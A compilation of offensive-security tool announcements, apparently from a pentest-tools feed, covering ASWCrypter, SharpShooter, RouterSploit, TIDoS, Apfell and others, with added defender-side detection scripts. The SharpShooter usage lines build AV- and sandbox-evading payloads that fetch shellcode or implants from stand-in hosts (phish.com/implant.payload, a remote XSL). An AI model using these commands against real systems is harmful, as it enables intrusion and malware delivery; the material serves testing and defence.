ASWCrypter – A Bash & Python Script For Generating Payloads that Bypass All Antivirus

A Bash & Python script for generating payloads that have bypassed all antivirus so far (FUD). PLEASE DON'T UPLOAD THE BACKDOOR TO WWW.VIRUSTOTAL.COM.

Important: this version is just for testing. In future I will update ASWCrypter to generate payloads for Linux, Mac and Windows. ;)

Legal Disclaimer: the author does not hold any responsibility for the bad use of this tool; remember this is only for educational purposes.

Requirements

1. Metasploit Framework
2. Python

Getting Started

    git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
    cd ASWCrypter
    chmod +x setup.sh

(The original instructions also offer chmod 777 setup.sh; chmod +x is sufficient and avoids making the script world-writable.)

Download ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

SharpShooter – Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.

SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.

SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.

Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.

SharpShooter targets v2, v3 and v4 of the .NET framework, which will be found on most end-user Windows workstations.

Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To accomplish this new functionality, several new flags were added: --com, --awl and --awlurl. Further information can be found in the MDSec blog post.

Usage – Command Line Mode

SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types. Running SharpShooter with the --help argument will produce the following output:

    usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                           [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                           [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                           [--rawscfile <path>] [--shellcode] [--scfile <path>]
                           [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                           [--web <web>] [--dns <dns>] [--output <output>]
                           [--smuggle] [--template <tpl>]

    optional arguments:
      -h, --help            show this help message and exit
      --stageless           Create a stageless payload
      --dotnetver <ver>     Target .NET Version: 2 or 4
      --com <com>           COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
      --awl <awl>           Application Whitelist Bypass Technique: wmic, regsvr32
      --awlurl <awlurl>     URL to retrieve XSL/SCT payload
      --payload <format>    Payload type: hta, js, jse, vba, vbe, vbs, wsf
      --sandbox <types>     Anti-sandbox techniques:
                            [1] Key to Domain (e.g. 1=CONTOSO)
                            [2] Ensure Domain Joined
                            [3] Check for Sandbox Artifacts
                            [4] Check for Bad MACs
                            [5] Check for Debugging
      --amsi <amsi>         Use amsi bypass technique: amsienable
      --delivery <type>     Delivery method: web, dns, both
      --rawscfile <path>    Path to raw shellcode file for stageless payloads
      --shellcode           Use built in shellcode execution
      --scfile <path>       Path to shellcode file as CSharp byte array
      --refs <refs>         References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll
      --namespace <ns>      Namespace for custom CSharp, e.g. Foo.bar
      --entrypoint <ep>     Method to execute, e.g. Main
      --web <web>           URI for web delivery
      --dns <dns>           Domain for DNS delivery
      --output <output>     Name of output file (e.g. maldoc)
      --smuggle             Smuggle file inside HTML
      --template <tpl>      Name of template file (e.g. mcafee)

Examples of some use cases are provided below.

Stageless JavaScript

    SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.

Stageless HTA

    SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Create a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. An HTML smuggling payload will also be generated, named foo.html, in the output directory. This payload will use the example McAfee virus scan template.

Staged VBS

    SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in an HTML file using the HTML smuggling technique with the McAfee virus scan template. The resultant payload is stored in the output directory named foo.html.

Custom CSharp inside VBS

    SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee

This example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload, which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.

Creation of a Squiblytwo VBS

    SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl

This example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe, which in turn executes a hosted stylesheet. The --awl parameter is not used here; it defaults to wmic.

Creation of an XSL HTA

    SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl

This example creates an HTA smuggled file that uses the XMLDOM COM interface to retrieve and execute a hosted stylesheet.

Author and Credits

Author: Dominic Chell, MDSec ActiveBreach (@domchell and @mdseclabs)

Credits:
- @tiraniddo: James Forshaw for […]
- […]: for […]
- […]: Rich Warren for […]
- […] and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for […]
- […]: Documentation for Squiblydoo and Squiblytwo techniques

Download SharpShooter
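As an added, defender-side example that is not part of SharpShooter or the MDSec project: a small Python triage script that applies the staging relationships described above (the --com parents, the --awl binaries fetching the --awlurl stylesheet, and script hosts launched from Outlook) to constructed process-creation telemetry. The log line format, the rule names and the mapping from COM primitive to parent process are assumptions to verify against your own telemetry.

```python
"""
Added example (not SharpShooter code): process-creation heuristics for the
staging patterns the section above describes, run over constructed
endpoint telemetry lines. Rule names and the log line format are assumed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Parents that the listed COM staging primitives typically produce (assumption,
# verify against your own telemetry): --com outlook -> outlook.exe,
# --com wscript -> wscript.exe/cscript.exe, --com wmi -> WmiPrvSE.exe.
COM_STAGER_PARENTS = {"outlook.exe", "wscript.exe", "cscript.exe", "wmiprvse.exe"}
# Application-whitelist bypass binaries named by --awl (wmic = Squiblytwo,
# regsvr32 = Squiblydoo); both fetch the XSL/SCT given by --awlurl.
AWL_BINARIES = {"wmic.exe", "regsvr32.exe"}
# Hosts for the script formats SharpShooter emits (hta, js, jse, vbs, vbe, wsf).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# A URL, or a stylesheet/scriptlet reference, on an AWL binary's command line.
REMOTE_SCRIPTLET = re.compile(r"https?://|\.(?:xsl|sct)\b", re.I)

# Constructed telemetry format: parent=<image> image=<image> cmdline=<rest>
LINE_RE = re.compile(r"^parent=(\S+) image=(\S+) cmdline=(.*)$")


@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-cased
    image: str    # new process image name, lower-cased
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed 'parent=... image=... cmdline=...' telemetry line."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    return ProcEvent(m.group(1).lower(), m.group(2).lower(), m.group(3))


def evaluate(ev: ProcEvent) -> List[str]:
    """Return the names of the heuristics an event trips (empty list if none)."""
    hits: List[str] = []
    remote = bool(REMOTE_SCRIPTLET.search(ev.cmdline))
    if ev.image in AWL_BINARIES and remote:
        # wmic/regsvr32 pointed at an XSL/SCT or any URL: the --awlurl pattern.
        hits.append("AWL_REMOTE_SCRIPTLET")
    if ev.image in AWL_BINARIES and ev.parent in COM_STAGER_PARENTS:
        # An AWL binary whose parent is one of the COM staging hosts.
        hits.append("COM_STAGED_LOLBIN")
    if ev.image in SCRIPT_HOSTS and ev.parent == "outlook.exe":
        # A script host launched straight out of the mail client.
        hits.append("SCRIPT_HOST_FROM_OUTLOOK")
    return hits


def triage(log: str) -> Dict[int, List[str]]:
    """Map line index -> tripped heuristics, for every non-blank line that trips one."""
    results: Dict[int, List[str]] = {}
    for i, line in enumerate(l for l in log.splitlines() if l.strip()):
        hits = evaluate(parse_line(line))
        if hits:
            results[i] = hits
    return results


# Constructed telemetry. The first line mirrors the Squiblytwo example above
# (wmic fetching http://192.168.2.8:8080/foo.xsl); the others are benign
# controls plus an HTA launched from Outlook.
SAMPLE_LOG = r"""
parent=OUTLOOK.EXE image=wmic.exe cmdline=wmic.exe os get /format:"http://192.168.2.8:8080/foo.xsl"
parent=explorer.exe image=regsvr32.exe cmdline=regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"
parent=OUTLOOK.EXE image=mshta.exe cmdline=mshta.exe C:\Users\alice\AppData\Local\Temp\foo.hta
parent=cmd.exe image=wmic.exe cmdline=wmic.exe os get caption
"""

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_LOG).items():
        print(idx, names)
```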

Link: http://feedproxy.google.com/~r/PentestTools/~3/KJriJP1hJA4/sharpshooter-payload-generation.html

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.

It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes; think compression and decompression), and higher level logic (actually doing something with those objects).

By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid reimplementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.

Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.

You can get an idea of the available codecs by looking at the Netty source on GitHub, under the codec* directories.

Building Mallet

Mallet makes use of Maven, so compiling the code is a matter of:

    mvn package

To run it:

    cd target/
    java -jar mallet-1.0-SNAPSHOT-spring-boot.jar

There are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so the others should be applicable to any app that sends JSON messages.

The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.

Download Mallet

Link: http://feedproxy.google.com/~r/PentestTools/~3/uEIqUbaTQy4/mallet-framework-for-creating-proxies.html

EKFiddle – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study exploit kits, malvertising and malicious traffic in general.

Installation

Download and install the latest version of Fiddler: https://www.telerik.com/fiddler

Special instructions for Linux and Mac are here:
https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1

Enable C# scripting (Windows only): launch Fiddler, go to Tools -> Options, and in the Scripting tab change the default (JScript.NET) to C#.

Change the default text editor (optional): in the same Tools -> Options menu, click on the Tools tab.
  Windows: notepad.exe or notepad++.exe
  Linux: gedit
  Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app

Close Fiddler.

Download or clone CustomRules.cs into the appropriate folder based on your operating system:
  Windows (7/10): C:\Users\[username]\Documents\Fiddler2\Scripts\
  Ubuntu: /home/[username]/Fiddler2/Scripts/
  Mac: /Users/[username]/Fiddler2/Scripts/

Finish up the installation: start Fiddler to complete the installation of EKFiddle. That's it, you're all set!

Features

Toolbar buttons

The added toolbar buttons give you quick shortcuts to some of the main features:

QuickSave: dumps the current web sessions into a SAZ named QuickSave-"MM-dd-yyyy-HH-mm-ss".saz in EKFiddle\Captures.

UI mode: toggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).

VPN: a VPN GUI built directly into Fiddler. It uses the OpenVPN client on Windows and Linux with .ovpn files (signing up with a commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous one to ensure only one TAP adapter is used at any given time.
  Windows: download and install OpenVPN in the default directory, then place your .ovpn files inside OpenVPN's config folder.
  Linux (tested on Ubuntu 16.04): sudo apt-get install openvpn, then place your .ovpn files in /etc/openvpn.

Proxy: allows you to connect to an upstream proxy (HTTP/s or SOCKS).

Import SAZ/PCAP: a shortcut to load SAZ (Fiddler's native format) or PCAP (i.e. from Wireshark) captures.

View/Edit Regexes: view and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally, the custom list lets you create your own rules.

Run Regexes: run the master and custom regular expressions against the current web sessions.

Clear Markings: clear any comment and colour highlighting in the currently loaded sessions.

ContextAction menu

The ContextAction menu (accessed by right-clicking on any session(s)) allows you to perform additional commands on the selected sessions. This can be very helpful to do quick lookups, compute hashes or extract IOCs.

Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ): query the hostname for the currently selected session.

URI
  Build Regex: create a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
  Open in... Internet Explorer, Chrome, Firefox, Edge: opens up the URI with the browser you selected.

Response Body
  Remove encoding: decodes the currently selected sessions (from their basic encoding).
  Build Regex: create a regular expression from the currently selected session's source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
  Calculate MD5/SHA256 hash: gets the current session's body and computes its hash.
  Hybrid Analysis / VirusTotal lookup: hashes the current session's body, then looks up that hash.
  Extract to Disk: downloads the currently selected session(s)' body to disk, into the 'Artifacts' folder.
  Extract IOCs: copies into memory basic information from the selected sessions so that they can be shared as IOCs.

Connect-the-dots: allows you to identify the sequence of events between sessions. Right-click on the session you are interested in retracing your steps to and simply 'connect the dots'. It will label the sequence of events from 01 to n within the Comments column. You can reorder that column to have a condensed view of the sequence.

Crawler: load a list of URLs from a text file and let the browser automatically visit them (Tools -> Crawler (experimental) -> Start crawler). This may require some tweaks in your browser's settings, in particular with regards to crash recovery:
  IE: not needed
  Firefox: in about:config, set toolkit.startup.max_resumed_crashes to -1
  Chrome: not needed
  Edge: fix already included

Uninstalling EKFiddle

Delete CustomRules.cs.

Download EKFiddle
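As an added example that is not part of EKFiddle (and whose rule patterns are constructed rather than taken from the master list): a Python model of the Run Regexes, Calculate hash, Extract IOCs and Connect-the-dots actions described above, applied to a constructed four-session capture. The Session fields, the (name, field, regex) rule format and the Referer walk that numbers the chain 01..n are assumptions about how such a workflow can be reproduced outside Fiddler.

```python
"""
Added example (not EKFiddle code): a minimal, offline model of the
"Run Regexes", "Calculate MD5/SHA256 hash", "Extract IOCs" and
"Connect-the-dots" actions, run over constructed sessions instead of a
live Fiddler capture.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed rules. Format assumed here: (name, field, regex); EKFiddle's
# real master list is maintained separately on GitHub.
RULES = [
    ("EK_Gate_URI",     "uri",  r"/gate\.php\?id=\d+"),
    ("EK_Landing_Body", "body", r"<title>\s*Loading\s*\.\.\.\s*</title>"),
    ("PE_Download",     "body", r"\AMZ"),   # DOS/PE header at offset 0
]


@dataclass
class Session:
    """A captured web session, reduced to the fields the checks below need."""
    id: int
    host: str
    ip: str
    uri: str
    body: bytes
    referer: Optional[str] = None
    comment: str = ""            # Fiddler's Comments column

    @property
    def url(self) -> str:
        return f"http://{self.host}{self.uri}"


# Constructed capture: publisher page -> redirector -> gate/landing -> binary.
SESSIONS = [
    Session(1, "news.example.test", "198.51.100.10", "/article.html",
            b"<html><body>story</body></html>"),
    Session(2, "redir.example.test", "198.51.100.20", "/r?x=1", b"",   # 302, empty body
            referer="http://news.example.test/article.html"),
    Session(3, "land.example.test", "203.0.113.5", "/gate.php?id=12",
            b"<html><title>Loading ...</title></html>",
            referer="http://redir.example.test/r?x=1"),
    Session(4, "land.example.test", "203.0.113.5", "/dl",
            b"MZ\x90\x00\x03\x00", referer="http://land.example.test/gate.php?id=12"),
]


def run_regexes(sessions: List[Session], rules=RULES) -> Dict[int, List[str]]:
    """'Run Regexes': test each rule against the chosen field of every session,
    record the matching rule names in the session's comment, and return the hits."""
    hits: Dict[int, List[str]] = {}
    for s in sessions:
        for name, field, pattern in rules:
            haystack = s.uri if field == "uri" else s.body.decode("latin-1")
            if re.search(pattern, haystack, re.IGNORECASE):
                hits.setdefault(s.id, []).append(name)
        if s.id in hits:
            s.comment = "; ".join(hits[s.id])
    return hits


def body_hash(session: Session, algo: str = "sha256") -> str:
    """'Calculate MD5/SHA256 hash' of the response body (e.g. for a VT lookup)."""
    return hashlib.new(algo, session.body).hexdigest()


def extract_iocs(sessions: List[Session]) -> List[str]:
    """'Extract IOCs': one line per session with host, IP, URL and body hash."""
    return [f"{s.host},{s.ip},{s.url},{body_hash(s)}" for s in sessions]


def connect_the_dots(sessions: List[Session], target_id: int) -> List[int]:
    """'Connect-the-dots': follow Referer headers backwards from the selected
    session to the first hop, then number the chain 01..n in the comments."""
    by_url = {s.url: s for s in sessions}
    by_id = {s.id: s for s in sessions}
    chain = [by_id[target_id]]
    seen = {target_id}
    while chain[-1].referer in by_url:
        prev = by_url[chain[-1].referer]
        if prev.id in seen:          # guard against Referer loops
            break
        seen.add(prev.id)
        chain.append(prev)
    chain.reverse()
    for n, s in enumerate(chain, 1):
        s.comment = f"{n:02d}" + (f" {s.comment}" if s.comment else "")
    return [s.id for s in chain]


if __name__ == "__main__":
    print(run_regexes(SESSIONS))
    print(connect_the_dots(SESSIONS, 4))
    for line in extract_iocs(SESSIONS):
        print(line)
```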

Link: http://feedproxy.google.com/~r/PentestTools/~3/OrfyeIMprN4/ekfiddle-framework-based-on-fiddler-web.html

RouterSploit v3.3.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of various modules that aid penetration testing operations:

- exploits: modules that take advantage of identified vulnerabilities
- creds: modules designed to test credentials against network services
- scanners: modules that check if a target is vulnerable to any exploit
- payloads: modules that are responsible for generating payloads for various architectures and injection points
- generic: modules that perform generic attacks

Installation

Requirements

Required: future, requests, paramiko, pysnmp, pycrypto
Optional: bluepy (Bluetooth Low Energy)

Installation on Kali Linux

    apt-get install python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

Bluetooth Low Energy support:

    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

Installation on Ubuntu 18.04 & 17.10

    sudo add-apt-repository universe
    sudo apt-get install git python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

Bluetooth Low Energy support:

    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

Installation on OSX

    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    sudo python3 -m pip install -r requirements.txt
    python3 rsf.py

Running on Docker

    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    docker build -t routersploit .
    docker run -it --rm routersploit

Update

Update the RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

    cd routersploit
    git pull

Download RouterSploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/bGEb3P4Ibw4/routersploit-v330-exploitation.html

TIDoS Framework – The Offensive Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. Let's keep this simple.

Highlights

The main highlights of this framework are:

- TIDoS Framework now boasts a century+ of modules.
- A complete, versatile framework to cover everything from Reconnaissance to Vulnerability Analysis.
- Has 5 main phases, subdivided into 14 sub-phases consisting of a total of 104 modules.
- Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).
- Scanning & Enumeration Phase has 15 modules (including port scans, WAF analysis, etc.).
- Vulnerability Analysis Phase has 36 modules (including the most common vulnerabilities in action).
- Exploits Castle has only 1 exploit (purely developmental).
- And finally, Auxiliaries have 4 modules (under development).
- All four phases each have an Auto-Awesome module which automates every module for you. You just need the domain, and leave everything else to this tool.
- TIDoS has full verbose output support, so you'll know what's going on.
- Fully user friendly interaction environment.

Installation

Clone the repository locally and navigate there:

    git clone https://github.com/theinfecteddrake/tidos-framework.git
    cd tidos-framework

Install the dependencies:

    chmod +x install
    ./install

That's it! Now you are good to go. Run the tool with:

    tidos

Getting Started

TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.

But before that, you need to set your own API keys for various OSINT purposes. To do so, open up API_KEYS.py under the files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API keys and access tokens for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!

Finally, as the framework opens up, enter the website name, e.g. http://www.example.com, and let TIDoS lead you. That's it! It's as easy as that.

Recommended: follow the order of the tool (run in a schematic way): Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis.

To update this tool, use the tidos_updater.py module under the tools/ folder.

Flawless Features

TIDoS Framework presently supports the following (and is under active development):

Reconnaissance + OSINT

Passive Reconnaissance:
- Nping Enumeration (via external API)
- WhoIS Lookup (domain info gathering)
- GeoIP Lookup (pinpoint physical location)
- DNS Configuration Lookup (DNSDump)
- Subdomains Lookup (indexed ones)
- Reverse DNS Lookup (host instances)
- Reverse IP Lookup (hosts on same server)
- Subnets Enumeration (class based)
- Domain IP History (IP instances)
- Web Links Gatherer (indexed ones)
- Google Search (manual search)
- Google Dorking (multiple modules, automated)
- Email to Domain Resolver (email WhoIs)
- Wayback Machine Lookups (find backups)
- Breached Email Check (pwned email accounts)
- Enumeration via Google Groups (emails only)
- Check Alias Availability (social networks)
- Find PasteBin Posts (domain based)
- LinkedIn Gathering (employees & company)
- Google Plus Gathering (domain profiles)
- Public Contact Info Scraping (FULL CONTACT)
- Censys Intel Gathering (domain based)
- Threat Intelligence Gathering (bad IPs)

Active Reconnaissance:
- Ping Enumeration (advanced)
- CMS Detection (185+ CMSs supported) (IMPROVED)
- Advanced Traceroute (IMPROVED)
- robots.txt and sitemap.xml Checker
- Grab HTTP Headers (live capture)
- Find HTTP Methods Allowed (via OPTIONS)
- Detect Server Type (IMPROVED)
- Examine SSL Certificate (absolute)
- Apache Status Disclosure Checks (file based)
- WebDAV HTTP Enumeration (PROPFIND & SEARCH)
- PHPInfo File Enumeration (via bruteforce)
- Comments Scraper (regex based)
- Find Shared DNS Hosts (name server based)
- Alternate Sites Discovery (User-Agent based)
- Discover Interesting Files via Bruteforce:
  - Common Backdoor Locations (shells, etc.)
  - Common Backup Locations (.bak, .db, etc.)
  - Common Password Locations (.pgp, .skr, etc.)
  - Common Proxy Path Configs (.pac, etc.)
  - Common Dot Files (.htaccess, .apache, etc.)

Information Disclosure:
- Credit Cards Disclosure (if plaintext)
- Email Harvester (IMPROVED)
- Fatal Errors Enumeration (includes Full Path Disclosure)
- Internal IP Disclosure (signature based)
- Phone Number Harvester (signature based)
- Social Security Number Harvester (US ones)

Scanning & Enumeration

- Remote Server WAF Enumeration (generic, 54 WAFs)
- Port Scanning (ingenious modules):
  - Simple Port Scanner (via socket connections)
  - TCP SYN Scan (highly reliable)
  - TCP Connect Scan (highly reliable)
  - XMAS Flag Scan (reliable only in LANs)
  - FIN Flag Scan (reliable only in LANs)
  - Port Service Detector
- Web Technology Enumeration (absolute)
- Operating System Fingerprinting (IMPROVED)
- Banner Grabbing of Services (via open ports)
- Interactive Scanning with NMap (16 preloaded modules)
- Enumeration of Domain-Linked IPs (using CENSYS database)
- Web and Links Crawlers:
  - Depth 1 (indexed URI crawler)
  - Depth 2 (single page crawler)
  - Depth 3 (web link crawler)

Vulnerability Analysis

Web-Bugs & Server Misconfigurations:
- Insecure CORS (absolute)
- Same-Site Scripting (sub-domain based)
- Zone Transfer (DNS server based)
- Clickjacking: Frame-Busting Checks; X-FRAME-OPTIONS Header Checks
- Security on Cookies: HTTPOnly Flag; Secure Flag
- Cloudflare Misconfiguration Check
- DNS Misconfiguration Checks
- Online Database Lookup For Breaches
- HTTP Strict Transport Security Usage (HTTPS enabled but no HSTS)
- Domain Based Email Spoofing: Missing SPF Records; Missing DMARC Records
- Host Header Injection (port based, over HTTP 80); X-Forwarded-For Header Injection
- Security Headers Analysis (live capture)
- Cross-Site Tracing (HTTP TRACE method)
- Session Fixation (via cookie injection)
- Network Security Misconfig.: checks for TELNET enabled via port 23

Serious Web Vulnerabilities:
- File Inclusions: Local File Inclusion (LFI, param based); Remote File Inclusion (RFI, IMPROVED: parameter based, pre-loaded path based)
- OS Command Injection (Linux & Windows, RCE)
- Path Traversal (sensitive paths)
- Cross-Site Request Forgery (absolute)
- SQL Injection:
  - Error Based Injection: cookie value based; Referer value based; User-Agent value based; auto-gathering (IMPROVED)
  - Blind Based Injection (crafted payloads): cookie value based; Referer value based; User-Agent value based; auto-gathering (IMPROVED)
- LDAP Injection (parameter based)
- HTML Injection (parameter based)
- Bash Command Injection (ShellShock)
- XPATH Injection (parameter based)
- Cross-Site Scripting (IMPROVED): cookie value based; Referer value based; User-Agent value based; parameter value based (manual)
- Unvalidated URL Forwards (open redirect)
- PHP Code Injection (Windows + Linux)
- HTTP Response Splitting (CRLF injection): User-Agent value based; parameter value based (manual)
- Sub-domain Takeover (50+ services): single sub-domain (manual); all subdomains (automated)

Other:
- PlainText Protocol Default Credential Bruteforce: FTP, SSH, POP 2/3, SQL, XMPP, SMTP and TELNET protocol bruteforce

Auxiliary Modules
- Hash Generator (MD5, SHA1, SHA256, SHA512)
- String & Payload Encoder (7 categories)
- Forensic Image Analysis (metadata extraction)
- Web HoneyPot Probability (ShodanLabs HoneyScore)

Exploitation (purely developmental)
- ShellShock

Other Tools:
- net_info.py: displays information about your network. Located under tools/.
- tidos_updater.py: updates the framework to the latest release via signature matching. Located under tools/.

Version: v1.6 [latest release] [#stable]

Upcoming:
- There are some bruteforce modules to be added.
- Some more Enumeration & Information Disclosure modules.
- Lots more OSINT & stuff (let that be a suspense).
- More Auxiliary Modules.
- Some Exploits are being worked on too.

Known Bugs: this version of TIDoS is purely developmental and is presently stable. There are bugs in resolving the [99] Back option at various end-points, which results in blind fall-backs. Though I have added global exception handling, there may still be bugs out there. Also, TIDoS needs to develop more on logging all info displayed on the screen (help needed).

Disclaimer: TIDoS is provided as an offensive web application audit framework. It has built-in modules which can reveal potential misconfigurations and vulnerabilities in web applications which could possibly be exploited maliciously. THEREFORE, I AM NOT EXCLUSIVELY RESPONSIBLE FOR ANY MISUSE OF THIS TOOLKIT.

Download TIDoS-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/dCgUcSrbBrM/tidos-framework-offensive-web.html

Apfell – A macOS, Post-Exploit, Red Teaming Framework

A macOS, post-exploit, red teaming framework built with python3 and JavaScript. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming.

Details

Check out the blog post on the initial release of the framework and what the bare bones content can do.

Installation

Get the code from this GitHub:

    git clone https://github.com/its-a-feature/Apfell

Install and set up the requirements (Note: the Sanic webserver says it only works on Linux):

    # The setup.sh will install postgres and pip3 install the requirements
    cd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..

Configure the installation in app/__init__.py:

    # -------- CONFIGURE SETTINGS HERE -----------
    db_name = 'apfell_db'
    db_user = 'apfell_user'
    db_pass = 'super_secret_apfell_user_password'
    server_ip = '127.0.0.1'  # this will be used by the browser to callback here, edit this!
    listen_port = '443'
    listen_ip = '0.0.0.0'  # IP to bind to for the server, 0.0.0.0 means all local IPv4 addresses
    ssl_cert_path = './app/ssl/apfell-cert.pem'
    ssl_key_path = './app/ssl/apfell-ssl.key'
    use_ssl = True

The db_pass value shown here is the shipped default; change it before the server is reachable from anything other than localhost.

There is currently an issue with Sanic and websockets 6/7 (tracked issue, but no pull request yet). You need to edit Sanic with a slight update (I'm going to make a pull request for Sanic so we don't need to do this, but that'll take a little while). In the meantime, run sudo find / -type f -name "app.py" to find the appropriate Sanic file to edit. In there, find the line that says protocol = request.transport._protocol and edit it to be:

    if hasattr(request.transport, '_app_protocol'):
        protocol = request.transport._app_protocol
    else:
